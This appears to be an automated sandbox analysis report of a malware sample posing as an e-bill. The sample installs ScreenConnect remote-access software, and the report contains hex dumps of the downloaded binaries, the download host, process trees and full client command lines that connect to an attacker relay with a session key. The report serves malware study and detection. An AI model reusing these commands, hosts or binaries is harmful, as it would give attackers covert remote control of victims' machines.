                                                                                                                                                2024-10-02 04:25:34 UTC16384INData Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04
                                                                                                                                                Data Ascii: (+~s`(!+(%-&(oA(*~**(oA(~oo*.(o^*.(oD*.(oJ*.(oL*.(oH*.(oB*.(oD*.(oF*.(oD*.(ob*.(od*.(of*.(
                                                                                                                                                2024-10-02 04:25:34 UTC16384INData Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9
                                                                                                                                                Data Ascii: %(!+*0EAs}s(+~%-&~s%(+*0.B~r@pd(o,o"*"(s(,#(o(**V(-s*s*f(-s
                                                                                                                                                2024-10-02 04:25:34 UTC16384INData Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06
                                                                                                                                                Data Ascii: o((((*v(#% o% o*0(,+((((,((s;*(((((-d(((((-?(((((-((((


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                12192.168.2.64973879.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:35 UTC86OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:35 UTC217INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 548864
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:35 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:35 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72
                                                                                                                                                Data Ascii: &*{l*"}l*:(<(m*0(<oF{n-(++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80
                                                                                                                                                Data Ascii: :(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00
                                                                                                                                                Data Ascii: o:3*oXo(Y+s9*%-&~o~%-&~s%(+(n(r+*n((*>s%}*s'~%-&Ds;%(+*(+(+-j+j(L(+*&f__`*v(
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a
                                                                                                                                                Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28
                                                                                                                                                Data Ascii: (jX}{~*(+*0)Q{(+tO|(+3*0)Q{(-tO|(+3*V(6}}*{*{*Z(>Z((?X*(=u}u}*(c,{(
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07
                                                                                                                                                Data Ascii: o-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{@*{A*0G*~-:~(,~
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00
                                                                                                                                                Data Ascii: :j******0iY(`(2*sjz(<*.s2*(<*2{3oB*(<*6{o{*(<*6{o{*.s8*(<*"(]*"(c*(<*0{;(+d(zo6*0
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a
                                                                                                                                                Data Ascii: (V*(<*6{/o0*6{/o0*(<*J{"{#(1*(<*J{'{((1*.s%*(<*o"*oC*.s(*(<*oC*.s**(<*"(R*:NoC*.s-*(<*:oC*(<*
                                                                                                                                                2024-10-02 04:25:35 UTC16384INData Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03
                                                                                                                                                Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5


                                                                                                                                                Click to jump to process

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Click to jump to process

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:00:25:10
                                                                                                                                                Start date:02/10/2024
                                                                                                                                                Path:C:\Users\user\Desktop\E_BILL0041272508.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\E_BILL0041272508.exe"
                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                File size:83'352 bytes
                                                                                                                                                MD5 hash:9FFC98A16ABA4841E94B24CCABF219AB
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:00:25:10
                                                                                                                                                Start date:02/10/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                Imagebase:0x23cca300000
                                                                                                                                                File size:24'856 bytes
                                                                                                                                                MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.4002929791.0000023CE6080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:00:25:12
                                                                                                                                                Start date:02/10/2024
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:00:25:35
                                                                                                                                                Start date:02/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"
                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                File size:601'376 bytes
                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:00:25:36
                                                                                                                                                Start date:02/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                Imagebase:0x20000
                                                                                                                                                File size:95'520 bytes
                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:00:25:36
                                                                                                                                                Start date:02/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                Imagebase:0x20000
                                                                                                                                                File size:95'520 bytes
                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:00:25:37
                                                                                                                                                Start date:02/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User"
                                                                                                                                                Imagebase:0x20000
                                                                                                                                                File size:601'376 bytes
                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:3.5%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:3.8%
                                                                                                                                                  Total number of Nodes:1471
                                                                                                                                                  Total number of Limit Nodes:34
                                                                                                                                                  execution_graph 6141 9b7419 6151 9b7fb2 6141->6151 6145 9b7426 6164 9b828e 6145->6164 6148 9b7450 6149 9b4869 _free 15 API calls 6148->6149 6150 9b745b 6149->6150 6168 9b7fbb 6151->6168 6153 9b7421 6154 9b81ee 6153->6154 6155 9b81fa ___scrt_is_nonwritable_in_current_image 6154->6155 6188 9b56e2 EnterCriticalSection 6155->6188 6157 9b8205 6158 9b8270 6157->6158 6161 9b8244 DeleteCriticalSection 6157->6161 6189 9b901c 6157->6189 6202 9b8285 6158->6202 6160 9b827c _abort 6160->6145 6163 9b4869 _free 15 API calls 6161->6163 6163->6157 6165 9b7435 DeleteCriticalSection 6164->6165 6166 9b82a4 6164->6166 6165->6145 6165->6148 6166->6165 6167 9b4869 _free 15 API calls 6166->6167 6167->6165 6169 9b7fc7 ___scrt_is_nonwritable_in_current_image 6168->6169 6178 9b56e2 EnterCriticalSection 6169->6178 6171 9b806a 6183 9b808a 6171->6183 6174 9b8076 _abort 6174->6153 6176 9b7fd6 6176->6171 6177 9b7f6b 61 API calls 6176->6177 6179 9b7465 EnterCriticalSection 6176->6179 6180 9b8060 6176->6180 6177->6176 6178->6176 6179->6176 6186 9b7479 LeaveCriticalSection 6180->6186 6182 9b8068 6182->6176 6187 9b572a LeaveCriticalSection 6183->6187 6185 9b8091 6185->6174 6186->6182 6187->6185 6188->6157 6190 9b9028 ___scrt_is_nonwritable_in_current_image 6189->6190 6191 9b9039 6190->6191 6192 9b904e 6190->6192 6193 9b47f9 __dosmaperr 15 API calls 6191->6193 6198 9b9049 _abort 6192->6198 6205 9b7465 EnterCriticalSection 6192->6205 6194 9b903e 6193->6194 6196 9b473d _abort 21 API calls 6194->6196 6196->6198 6197 9b906a 6206 9b8fa6 6197->6206 6198->6157 6200 9b9075 6222 9b9092 6200->6222 6460 9b572a LeaveCriticalSection 6202->6460 6204 9b828c 